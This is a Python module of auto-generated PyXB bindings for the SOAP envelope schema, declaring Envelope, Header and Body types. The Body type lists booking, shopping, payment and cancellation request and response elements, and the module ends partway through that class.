import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:dd5dc02e-8af0-11e5-954c-7831c1d0cf70')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import silvershop as _ImportedBinding_silvershop
import pyxb.binding.datatypes
import silverbook as _ImportedBinding_silverbook
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://schemas.xmlsoap.org/soap/envelope/', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
    """Parse the given XML and use the document element to create a
    Python instance.
    @param xml_text An XML document. This should be data (Python 2
    str or Python 3 bytes), or a text (Python 2 unicode or Python 3
    str) in the L{pyxb._InputEncoding} encoding.
    @keyword default_namespace The L{pyxb.Namespace} instance to use as the
    default namespace where there is no default namespace in scope.
    If unspecified or C{None}, the namespace of the module containing
    this function will be used.
    @keyword location_base: An object to be recorded as the base of all
    L{pyxb.utils.utility.Location} instances associated with events and
    objects handled by the parser. You might pass the URI from which
    the document was obtained.
    """
    # NOTE: PyXB-generated code — regenerate from the schema rather than hand-edit.
    if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
        # DOM-based fallback when SAX-style parsing is not selected.
        dom = pyxb.utils.domutils.StringToDOM(xml_text)
        return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
    handler = saxer.getContentHandler()
    xmld = xml_text
    if isinstance(xmld, _six.text_type):
        # SAX path consumes bytes; encode text input first.
        xmld = xmld.encode(pyxb._InputEncoding)
    saxer.parse(io.BytesIO(xmld))
    instance = handler.rootObject()
    return instance
def CreateFromDOM (node, default_namespace=None):
    """Create a Python instance from the given DOM node.
    The node tag must correspond to an element declaration in this module.
    @deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
    # NOTE: PyXB-generated code — regenerate from the schema rather than hand-edit.
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.boolean):
    """An atomic simple type."""
    # PyXB-generated anonymous boolean type, restricted below to the
    # literal pattern '0|1'.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 87, 4)
    _Documentation = None
# Register the '0|1' pattern facet on the anonymous type.
STD_ANON._CF_pattern = pyxb.binding.facets.CF_pattern()
STD_ANON._CF_pattern.addPattern(pattern='0|1')
STD_ANON._InitializeFacetMap(STD_ANON._CF_pattern)
# List simple type: {http://schemas.xmlsoap.org/soap/envelope/}encodingStyle
# superclasses pyxb.binding.datatypes.anySimpleType
class encodingStyle (pyxb.binding.basis.STD_list):
    """
    'encodingStyle' indicates any canonicalization conventions followed in the contents of the containing element. For example, the value 'http://schemas.xmlsoap.org/soap/encoding/' indicates the pattern described in SOAP specification
    """
    # PyXB-generated list simple type: a list of anyURI values.
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'encodingStyle')
    _XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 94, 0)
    _Documentation = "\n        'encodingStyle' indicates any canonicalization conventions followed in the contents of the containing element. For example, the value 'http://schemas.xmlsoap.org/soap/encoding/' indicates the pattern described in SOAP specification\n    "
    _ItemType = pyxb.binding.datatypes.anyURI
encodingStyle._InitializeFacetMap()
# Register the binding in the namespace's type category.
Namespace.addCategoryObject('typeBinding', 'encodingStyle', encodingStyle)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Envelope with content type ELEMENT_ONLY
class Envelope_ (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://schemas.xmlsoap.org/soap/envelope/}Envelope with content type ELEMENT_ONLY"""
    # PyXB-generated binding for the SOAP Envelope: optional Header element,
    # Body element, plus a lax attribute wildcard excluding the SOAP
    # envelope namespace.  Regenerate from the schema rather than hand-edit.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Envelope')
    _XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 15, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://schemas.xmlsoap.org/soap/envelope/}Header uses Python identifier Header
    __Header = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Header'), 'Header', '__httpschemas_xmlsoap_orgsoapenvelope_Envelope__httpschemas_xmlsoap_orgsoapenvelopeHeader', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 23, 4), )
    Header = property(__Header.value, __Header.set, None, None)
    # Element {http://schemas.xmlsoap.org/soap/envelope/}Body uses Python identifier Body
    __Body = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Body'), 'Body', '__httpschemas_xmlsoap_orgsoapenvelope_Envelope__httpschemas_xmlsoap_orgsoapenvelopeBody', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 30, 4), )
    Body = property(__Body.value, __Body.set, None, None)
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/'))
    _HasWildcardElement = True
    _ElementMap.update({
        __Header.name() : __Header,
        __Body.name() : __Body
    })
    _AttributeMap.update({
    })
# Register the binding in the namespace's type category.
Namespace.addCategoryObject('typeBinding', 'Envelope', Envelope_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Header with content type ELEMENT_ONLY
class Header_ (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://schemas.xmlsoap.org/soap/envelope/}Header with content type ELEMENT_ONLY"""
    # PyXB-generated binding for the SOAP Header: no declared elements, only
    # a wildcard for arbitrary content and a lax attribute wildcard excluding
    # the SOAP envelope namespace.  Regenerate rather than hand-edit.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Header')
    _XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 24, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/'))
    _HasWildcardElement = True
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the binding in the namespace's type category.
Namespace.addCategoryObject('typeBinding', 'Header', Header_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Body with content type ELEMENT_ONLY
class Body_ (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://schemas.xmlsoap.org/soap/envelope/}Body with content type ELEMENT_ONLY"""
    # Generated binding for soap:Body.  It enumerates every operation payload
    # the service schema allows inside the body (shopping, booking-record,
    # payment and cancellation request/response pairs), each exposed as a
    # Python property backed by a pyxb ElementDeclaration.
    # NOTE(review): auto-generated from all.xsd — regenerate, don't hand-edit.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Body')
    _XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 31, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element pointToPointShoppingRequest uses Python identifier pointToPointShoppingRequest
    __pointToPointShoppingRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingRequest'), 'pointToPointShoppingRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__pointToPointShoppingRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12), )
    pointToPointShoppingRequest = property(__pointToPointShoppingRequest.value, __pointToPointShoppingRequest.set, None, None)
    # Element pointToPointShoppingResponse uses Python identifier pointToPointShoppingResponse
    __pointToPointShoppingResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingResponse'), 'pointToPointShoppingResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__pointToPointShoppingResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12), )
    pointToPointShoppingResponse = property(__pointToPointShoppingResponse.value, __pointToPointShoppingResponse.set, None, None)
    # Element travelPassShoppingRequest uses Python identifier travelPassShoppingRequest
    __travelPassShoppingRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'travelPassShoppingRequest'), 'travelPassShoppingRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__travelPassShoppingRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12), )
    travelPassShoppingRequest = property(__travelPassShoppingRequest.value, __travelPassShoppingRequest.set, None, None)
    # Element travelPassShoppingResponse uses Python identifier travelPassShoppingResponse
    __travelPassShoppingResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'travelPassShoppingResponse'), 'travelPassShoppingResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__travelPassShoppingResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12), )
    travelPassShoppingResponse = property(__travelPassShoppingResponse.value, __travelPassShoppingResponse.set, None, None)
    # Element scheduleSearchRequest uses Python identifier scheduleSearchRequest
    __scheduleSearchRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'scheduleSearchRequest'), 'scheduleSearchRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__scheduleSearchRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12), )
    scheduleSearchRequest = property(__scheduleSearchRequest.value, __scheduleSearchRequest.set, None, None)
    # Element scheduleSearchResponse uses Python identifier scheduleSearchResponse
    __scheduleSearchResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'scheduleSearchResponse'), 'scheduleSearchResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__scheduleSearchResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12), )
    scheduleSearchResponse = property(__scheduleSearchResponse.value, __scheduleSearchResponse.set, None, None)
    # Element addPaymentRequest uses Python identifier addPaymentRequest
    __addPaymentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'addPaymentRequest'), 'addPaymentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__addPaymentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12), )
    addPaymentRequest = property(__addPaymentRequest.value, __addPaymentRequest.set, None, None)
    # Element addPaymentResponse uses Python identifier addPaymentResponse
    __addPaymentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'addPaymentResponse'), 'addPaymentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__addPaymentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12), )
    addPaymentResponse = property(__addPaymentResponse.value, __addPaymentResponse.set, None, None)
    # Element authenticatePayerRequest uses Python identifier authenticatePayerRequest
    __authenticatePayerRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'authenticatePayerRequest'), 'authenticatePayerRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__authenticatePayerRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12), )
    authenticatePayerRequest = property(__authenticatePayerRequest.value, __authenticatePayerRequest.set, None, None)
    # Element authenticatePayerResponse uses Python identifier authenticatePayerResponse
    __authenticatePayerResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'authenticatePayerResponse'), 'authenticatePayerResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__authenticatePayerResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12), )
    authenticatePayerResponse = property(__authenticatePayerResponse.value, __authenticatePayerResponse.set, None, None)
    # Element cancelBookingRecordRequest uses Python identifier cancelBookingRecordRequest
    __cancelBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordRequest'), 'cancelBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__cancelBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12), )
    cancelBookingRecordRequest = property(__cancelBookingRecordRequest.value, __cancelBookingRecordRequest.set, None, None)
    # Element cancelBookingRecordResponse uses Python identifier cancelBookingRecordResponse
    __cancelBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordResponse'), 'cancelBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__cancelBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12), )
    cancelBookingRecordResponse = property(__cancelBookingRecordResponse.value, __cancelBookingRecordResponse.set, None, None)
    # Element claimValueDocumentRequest uses Python identifier claimValueDocumentRequest
    __claimValueDocumentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'claimValueDocumentRequest'), 'claimValueDocumentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__claimValueDocumentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12), )
    claimValueDocumentRequest = property(__claimValueDocumentRequest.value, __claimValueDocumentRequest.set, None, None)
    # Element claimValueDocumentResponse uses Python identifier claimValueDocumentResponse
    __claimValueDocumentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'claimValueDocumentResponse'), 'claimValueDocumentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__claimValueDocumentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12), )
    claimValueDocumentResponse = property(__claimValueDocumentResponse.value, __claimValueDocumentResponse.set, None, None)
    # Element confirmBookingRecordRequest uses Python identifier confirmBookingRecordRequest
    __confirmBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordRequest'), 'confirmBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__confirmBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12), )
    confirmBookingRecordRequest = property(__confirmBookingRecordRequest.value, __confirmBookingRecordRequest.set, None, None)
    # Element confirmBookingRecordResponse uses Python identifier confirmBookingRecordResponse
    __confirmBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordResponse'), 'confirmBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__confirmBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12), )
    confirmBookingRecordResponse = property(__confirmBookingRecordResponse.value, __confirmBookingRecordResponse.set, None, None)
    # Element createBookingRecordRequest uses Python identifier createBookingRecordRequest
    __createBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'createBookingRecordRequest'), 'createBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__createBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12), )
    createBookingRecordRequest = property(__createBookingRecordRequest.value, __createBookingRecordRequest.set, None, None)
    # Element createBookingRecordResponse uses Python identifier createBookingRecordResponse
    __createBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'createBookingRecordResponse'), 'createBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__createBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12), )
    createBookingRecordResponse = property(__createBookingRecordResponse.value, __createBookingRecordResponse.set, None, None)
    # Element recordFinancialTransactionRequest uses Python identifier recordFinancialTransactionRequest
    __recordFinancialTransactionRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionRequest'), 'recordFinancialTransactionRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__recordFinancialTransactionRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12), )
    recordFinancialTransactionRequest = property(__recordFinancialTransactionRequest.value, __recordFinancialTransactionRequest.set, None, None)
    # Element recordFinancialTransactionResponse uses Python identifier recordFinancialTransactionResponse
    __recordFinancialTransactionResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionResponse'), 'recordFinancialTransactionResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__recordFinancialTransactionResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12), )
    recordFinancialTransactionResponse = property(__recordFinancialTransactionResponse.value, __recordFinancialTransactionResponse.set, None, None)
    # Element redeliverValueDocumentRequest uses Python identifier redeliverValueDocumentRequest
    __redeliverValueDocumentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentRequest'), 'redeliverValueDocumentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__redeliverValueDocumentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12), )
    redeliverValueDocumentRequest = property(__redeliverValueDocumentRequest.value, __redeliverValueDocumentRequest.set, None, None)
    # Element redeliverValueDocumentResponse uses Python identifier redeliverValueDocumentResponse
    __redeliverValueDocumentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentResponse'), 'redeliverValueDocumentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__redeliverValueDocumentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12), )
    redeliverValueDocumentResponse = property(__redeliverValueDocumentResponse.value, __redeliverValueDocumentResponse.set, None, None)
    # Element retrieveBookingRecordRequest uses Python identifier retrieveBookingRecordRequest
    __retrieveBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordRequest'), 'retrieveBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12), )
    retrieveBookingRecordRequest = property(__retrieveBookingRecordRequest.value, __retrieveBookingRecordRequest.set, None, None)
    # Element retrieveBookingRecordResponse uses Python identifier retrieveBookingRecordResponse
    __retrieveBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordResponse'), 'retrieveBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12), )
    retrieveBookingRecordResponse = property(__retrieveBookingRecordResponse.value, __retrieveBookingRecordResponse.set, None, None)
    # Element returnValueDocumentRequest uses Python identifier returnValueDocumentRequest
    __returnValueDocumentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'returnValueDocumentRequest'), 'returnValueDocumentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__returnValueDocumentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12), )
    returnValueDocumentRequest = property(__returnValueDocumentRequest.value, __returnValueDocumentRequest.set, None, None)
    # Element returnValueDocumentResponse uses Python identifier returnValueDocumentResponse
    __returnValueDocumentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'returnValueDocumentResponse'), 'returnValueDocumentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__returnValueDocumentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12), )
    returnValueDocumentResponse = property(__returnValueDocumentResponse.value, __returnValueDocumentResponse.set, None, None)
    # Element searchBookingRecordsRequest uses Python identifier searchBookingRecordsRequest
    __searchBookingRecordsRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsRequest'), 'searchBookingRecordsRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__searchBookingRecordsRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12), )
    searchBookingRecordsRequest = property(__searchBookingRecordsRequest.value, __searchBookingRecordsRequest.set, None, None)
    # Element searchBookingRecordsResponse uses Python identifier searchBookingRecordsResponse
    __searchBookingRecordsResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsResponse'), 'searchBookingRecordsResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__searchBookingRecordsResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12), )
    searchBookingRecordsResponse = property(__searchBookingRecordsResponse.value, __searchBookingRecordsResponse.set, None, None)
    # Element updateBookingRecordRequest uses Python identifier updateBookingRecordRequest
    __updateBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'updateBookingRecordRequest'), 'updateBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__updateBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12), )
    updateBookingRecordRequest = property(__updateBookingRecordRequest.value, __updateBookingRecordRequest.set, None, None)
    # Element updateBookingRecordResponse uses Python identifier updateBookingRecordResponse
    __updateBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'updateBookingRecordResponse'), 'updateBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__updateBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12), )
    updateBookingRecordResponse = property(__updateBookingRecordResponse.value, __updateBookingRecordResponse.set, None, None)
    # Element refundBookingRecordRequest uses Python identifier refundBookingRecordRequest
    __refundBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'refundBookingRecordRequest'), 'refundBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__refundBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12), )
    refundBookingRecordRequest = property(__refundBookingRecordRequest.value, __refundBookingRecordRequest.set, None, None)
    # Element refundBookingRecordResponse uses Python identifier refundBookingRecordResponse
    __refundBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'refundBookingRecordResponse'), 'refundBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__refundBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12), )
    refundBookingRecordResponse = property(__refundBookingRecordResponse.value, __refundBookingRecordResponse.set, None, None)
    # Element validateBookingRecordInformationRequest uses Python identifier validateBookingRecordInformationRequest
    __validateBookingRecordInformationRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationRequest'), 'validateBookingRecordInformationRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__validateBookingRecordInformationRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12), )
    validateBookingRecordInformationRequest = property(__validateBookingRecordInformationRequest.value, __validateBookingRecordInformationRequest.set, None, None)
    # Element validateBookingRecordInformationResponse uses Python identifier validateBookingRecordInformationResponse
    __validateBookingRecordInformationResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationResponse'), 'validateBookingRecordInformationResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__validateBookingRecordInformationResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12), )
    validateBookingRecordInformationResponse = property(__validateBookingRecordInformationResponse.value, __validateBookingRecordInformationResponse.set, None, None)
    # Element generatePaymentTokenRequest uses Python identifier generatePaymentTokenRequest
    __generatePaymentTokenRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenRequest'), 'generatePaymentTokenRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__generatePaymentTokenRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12), )
    generatePaymentTokenRequest = property(__generatePaymentTokenRequest.value, __generatePaymentTokenRequest.set, None, None)
    # Element generatePaymentTokenResponse uses Python identifier generatePaymentTokenResponse
    __generatePaymentTokenResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenResponse'), 'generatePaymentTokenResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__generatePaymentTokenResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12), )
    generatePaymentTokenResponse = property(__generatePaymentTokenResponse.value, __generatePaymentTokenResponse.set, None, None)
    # Element deletePaymentTokenRequest uses Python identifier deletePaymentTokenRequest
    __deletePaymentTokenRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenRequest'), 'deletePaymentTokenRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__deletePaymentTokenRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12), )
    deletePaymentTokenRequest = property(__deletePaymentTokenRequest.value, __deletePaymentTokenRequest.set, None, None)
    # Element deletePaymentTokenResponse uses Python identifier deletePaymentTokenResponse
    __deletePaymentTokenResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenResponse'), 'deletePaymentTokenResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__deletePaymentTokenResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12), )
    deletePaymentTokenResponse = property(__deletePaymentTokenResponse.value, __deletePaymentTokenResponse.set, None, None)
    # Element retrieveCancellationSummaryRequest uses Python identifier retrieveCancellationSummaryRequest
    __retrieveCancellationSummaryRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryRequest'), 'retrieveCancellationSummaryRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveCancellationSummaryRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12), )
    retrieveCancellationSummaryRequest = property(__retrieveCancellationSummaryRequest.value, __retrieveCancellationSummaryRequest.set, None, None)
    # Element retrieveCancellationSummaryResponse uses Python identifier retrieveCancellationSummaryResponse
